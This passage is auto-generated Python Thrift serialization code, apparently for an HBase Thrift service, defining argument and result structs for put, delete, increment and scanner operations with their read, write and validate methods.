iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndPut_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.row is not None:
oprot.writeFieldBegin('row', TType.STRING, 2)
oprot.writeString(self.row)
oprot.writeFieldEnd()
if self.family is not None:
oprot.writeFieldBegin('family', TType.STRING, 3)
oprot.writeString(self.family)
oprot.writeFieldEnd()
if self.qualifier is not None:
oprot.writeFieldBegin('qualifier', TType.STRING, 4)
oprot.writeString(self.qualifier)
oprot.writeFieldEnd()
if self.value is not None:
oprot.writeFieldBegin('value', TType.STRING, 5)
oprot.writeString(self.value)
oprot.writeFieldEnd()
if self.put is not None:
oprot.writeFieldBegin('put', TType.STRUCT, 6)
self.put.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.row is None:
raise TProtocol.TProtocolException(message='Required field row is unset!')
if self.family is None:
raise TProtocol.TProtocolException(message='Required field family is unset!')
if self.qualifier is None:
raise TProtocol.TProtocolException(message='Required field qualifier is unset!')
if self.put is None:
raise TProtocol.TProtocolException(message='Required field put is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndPut_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndPut_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class putMultiple_args:
"""
Attributes:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'puts', (TType.STRUCT,(TPut, TPut.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, puts=None,):
self.table = table
self.puts = puts
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.puts = []
(_etype59, _size56) = iprot.readListBegin()
for _i60 in xrange(_size56):
_elem61 = TPut()
_elem61.read(iprot)
self.puts.append(_elem61)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('putMultiple_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.puts is not None:
oprot.writeFieldBegin('puts', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.puts))
for iter62 in self.puts:
iter62.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.puts is None:
raise TProtocol.TProtocolException(message='Required field puts is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class putMultiple_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('putMultiple_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteSingle_args:
"""
Attributes:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 2
)
def __init__(self, table=None, deleteSingle=None,):
self.table = table
self.deleteSingle = deleteSingle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.deleteSingle = TDelete()
self.deleteSingle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteSingle_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.deleteSingle is not None:
oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 2)
self.deleteSingle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.deleteSingle is None:
raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteSingle_result:
"""
Attributes:
- io
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, io=None,):
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteSingle_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteMultiple_args:
"""
Attributes:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.LIST, 'deletes', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 2
)
def __init__(self, table=None, deletes=None,):
self.table = table
self.deletes = deletes
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.deletes = []
(_etype66, _size63) = iprot.readListBegin()
for _i67 in xrange(_size63):
_elem68 = TDelete()
_elem68.read(iprot)
self.deletes.append(_elem68)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteMultiple_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.deletes is not None:
oprot.writeFieldBegin('deletes', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.deletes))
for iter69 in self.deletes:
iter69.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.deletes is None:
raise TProtocol.TProtocolException(message='Required field deletes is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteMultiple_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TDelete, TDelete.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype73, _size70) = iprot.readListBegin()
for _i74 in xrange(_size70):
_elem75 = TDelete()
_elem75.read(iprot)
self.success.append(_elem75)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteMultiple_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter76 in self.success:
iter76.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndDelete_args:
"""
Attributes:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRING, 'row', None, None, ), # 2
(3, TType.STRING, 'family', None, None, ), # 3
(4, TType.STRING, 'qualifier', None, None, ), # 4
(5, TType.STRING, 'value', None, None, ), # 5
(6, TType.STRUCT, 'deleteSingle', (TDelete, TDelete.thrift_spec), None, ), # 6
)
def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, deleteSingle=None,):
self.table = table
self.row = row
self.family = family
self.qualifier = qualifier
self.value = value
self.deleteSingle = deleteSingle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.row = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.family = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.qualifier = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.value = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.deleteSingle = TDelete()
self.deleteSingle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndDelete_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.row is not None:
oprot.writeFieldBegin('row', TType.STRING, 2)
oprot.writeString(self.row)
oprot.writeFieldEnd()
if self.family is not None:
oprot.writeFieldBegin('family', TType.STRING, 3)
oprot.writeString(self.family)
oprot.writeFieldEnd()
if self.qualifier is not None:
oprot.writeFieldBegin('qualifier', TType.STRING, 4)
oprot.writeString(self.qualifier)
oprot.writeFieldEnd()
if self.value is not None:
oprot.writeFieldBegin('value', TType.STRING, 5)
oprot.writeString(self.value)
oprot.writeFieldEnd()
if self.deleteSingle is not None:
oprot.writeFieldBegin('deleteSingle', TType.STRUCT, 6)
self.deleteSingle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.row is None:
raise TProtocol.TProtocolException(message='Required field row is unset!')
if self.family is None:
raise TProtocol.TProtocolException(message='Required field family is unset!')
if self.qualifier is None:
raise TProtocol.TProtocolException(message='Required field qualifier is unset!')
if self.deleteSingle is None:
raise TProtocol.TProtocolException(message='Required field deleteSingle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class checkAndDelete_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('checkAndDelete_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class increment_args:
"""
Attributes:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'increment', (TIncrement, TIncrement.thrift_spec), None, ), # 2
)
def __init__(self, table=None, increment=None,):
self.table = table
self.increment = increment
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.increment = TIncrement()
self.increment.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('increment_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.increment is not None:
oprot.writeFieldBegin('increment', TType.STRUCT, 2)
self.increment.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.increment is None:
raise TProtocol.TProtocolException(message='Required field increment is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class increment_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = TResult()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('increment_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class openScanner_args:
"""
Attributes:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'scan', (TScan, TScan.thrift_spec), None, ), # 2
)
def __init__(self, table=None, scan=None,):
self.table = table
self.scan = scan
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.scan = TScan()
self.scan.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('openScanner_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.scan is not None:
oprot.writeFieldBegin('scan', TType.STRUCT, 2)
self.scan.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.scan is None:
raise TProtocol.TProtocolException(message='Required field scan is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class openScanner_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('openScanner_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getScannerRows_args:
"""
Attributes:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'scannerId', None, None, ), # 1
(2, TType.I32, 'numRows', None, 1, ), # 2
)
def __init__(self, scannerId=None, numRows=thrift_spec[2][4],):
self.scannerId = scannerId
self.numRows = numRows
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.scannerId = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.numRows = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getScannerRows_args')
if self.scannerId is not None:
oprot.writeFieldBegin('scannerId', TType.I32, 1)
oprot.writeI32(self.scannerId)
oprot.writeFieldEnd()
if self.numRows is not None:
oprot.writeFieldBegin('numRows', TType.I32, 2)
oprot.writeI32(self.numRows)
